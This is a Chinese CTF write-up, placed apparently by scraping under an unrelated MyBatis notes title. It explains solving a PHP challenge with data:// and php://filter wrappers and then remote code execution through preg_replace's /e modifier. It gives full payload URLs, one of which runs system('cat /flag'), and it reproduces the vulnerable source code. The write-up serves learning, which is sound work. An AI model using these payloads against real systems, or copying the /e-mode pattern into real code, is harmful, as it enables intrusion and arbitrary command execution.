2. 程式人生 > 實用技巧 >Mybatis學習筆記【狂神說】

Mybatis學習筆記【狂神說】

阿新 發佈:2021-01-20

知識點

偽協議
preg_replace /e 模式下的程式碼漏洞問題

審題

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

get傳倆參 file_get_contents必須要讀到一個$text傳來的內容為I have a dream的檔案 想到用data偽協議來讀 看到了next.php這個hint 嘗試了一下直接?file=next.php不行 想了想用偽協議就行了
第一部分payload

?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php

這樣就能讀到next.php的內容了

第二步

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

然後就不會做了 瞄了一眼wp發現 原來preg_replace這個正則匹配表示式的/e模式這麼危險 可以進行rce 具體的解釋大家康康這位大佬的文章 寫的已經很詳細了
最終payload

http://fdad1be2-5788-4d7a-a515-f49309c1b0a3.node3.buuoj.cn//next.php?\S*=${getFlag()}&cmd=system(%27cat%20/flag%27);

EOF

相關推薦

Mybatis學習筆記

環境 Jdk 1.8 Mysql 5.7 Maven 3.6.1 IDEA 回顧 JDBC Mysql java基礎 Maven Junit SSM框架:都是有配置檔案的。最好的學習方式:看官方文件。

CSS隨堂筆記說JAVA

課程地址:https://www.bilibili.com/video/BV1YJ411a7dy 什麼是CSS CSS 簡介 Cascading Style Sheet 層疊樣式表

Bootstrap4.x學習筆記十一

    按鈕和按鈕組 一、按鈕樣式 1.使用.btn 和.btn-*實現按鈕的預設樣式;.btn 不單單在<button>元素下使用,也可以在<a>、<input>下使用

Bootstrap4.x學習筆記十二

      內容擴充套件管理器——卡片 卡片是一個內容擴充套件管理器,可以包含圖片、列表、文字、連結等多種組合

MySQL學習筆記基礎篇

從前曾經學過一下mysql的基礎內容,不過由於當時沒有認真學導致會的東西太少,現根據一個教程視訊的學習此內容對應基礎篇的P1-P178,完成了這個筆記,主要涉及mysql的基礎知識。

多執行緒學習筆記說視訊1-7)

執行緒不一定立即執行,由CPU安排排程 多執行緒程式設計:總而言之,多執行緒程式設計是為了滿足程式設計師編寫高效率的程式來達到充分利用 CPU 的目的。

多執行緒學習筆記說視訊8-14)

靜態代理 //結婚的介面 interface Marry{ void happyMarry(); } //真實角色,你去結婚 class You implements Marry{

多執行緒學習筆記說視訊15-20)

觀測執行緒狀態 public class TestState { public static void main(String[] args) throws InterruptedException {

多執行緒學習筆記說視訊21-28)

CopyOnWriteArrayList public class TestJUC { public static void main(String[] args) throws InterruptedException {

SpringCloud學習筆記十二SpringCloud Config服務配置

目錄本篇要點分散式系統面臨的問題Spring Cloud Config是什麼SpringCloud Config的作用SpringCloud Config整合Git搭建配置總控中心在Gitee上新建倉庫,並上傳檔案新建工程,引入依賴配置yml報錯!Auth fail主啟動類加

SpringCloud學習筆記十四:Spring Cloud Stream訊息驅動

目錄本篇要點Spring Cloud Stream概述設計思想標準的MQSpring Cloud StreamAPI及常用註解Spring Cloud Stream演示前置條件訊息驅動之生產者引入pom依賴配置yml主啟動類定義訊息的推送管道定義介面測試訊息驅動之消費

ESPIDF開發ESP32學習筆記WiFi實現

技術標籤:ESP32物聯網嵌入式wifi WiFi外設配置 ESP32/8266的Wi-Fi庫支援配置及監控Wi-Fi連網功能

MySQL學習筆記說)

語法1、初識MySQL 說https://space.bilibili.com/95256449/ JavaEE:企業級Java開發、Web 前端(頁面:展示—資料);

學習筆記 矩陣乘法

矩陣乘法 設 \\(A\\) 為 \\(n\\times k\\) 矩陣,\\(B\\) 為 \\(k\\times m\\) 矩陣,那麼它們的乘積 \\(C\\) 為一個 \\(n\\times m\\) 矩陣。

MyBatis學習大全(秦疆版)

一、MyBatis 1.什麼是Mybaits 概念:MyBatis 是一款優秀的持久層框架 它支援自定義 SQL、儲存過程以及高階對映。

Less學習筆記未完成

鎮樓圖 Pixiv: 注:此blog至少建立在一定的CSS基礎之上,其中選擇器更加重要 〇、LESS(Leaner Style Sheets)是什麼?

說Java學習筆記階段一JavaSE基礎(六)Java方法

筆記內容:說Java階段一Java基礎視訊P32--P44 說Java視訊連結 目錄 一、方法的定義及呼叫

說Java學習筆記階段一JavaSE基礎(七)遞迴

筆記內容:說Java階段一Java基礎視訊P50 說Java視訊連結 目錄 1、遞迴要素

說Java學習筆記階段一JavaSE基礎(九)氣泡排序

筆記內容:說Java階段一Java基礎視訊P58 說Java視訊連結 目錄 程式碼 程式碼解釋

說Java學習筆記---初識Java

初識Java 1. Java誕生 1972年C語言誕生 1982年C++誕生 1995年Java誕生 C語言貼近品牌,執行極快,效率極高。用於開發作業系統,編譯器,資料庫,網路系統等。擁有強大的指標管理。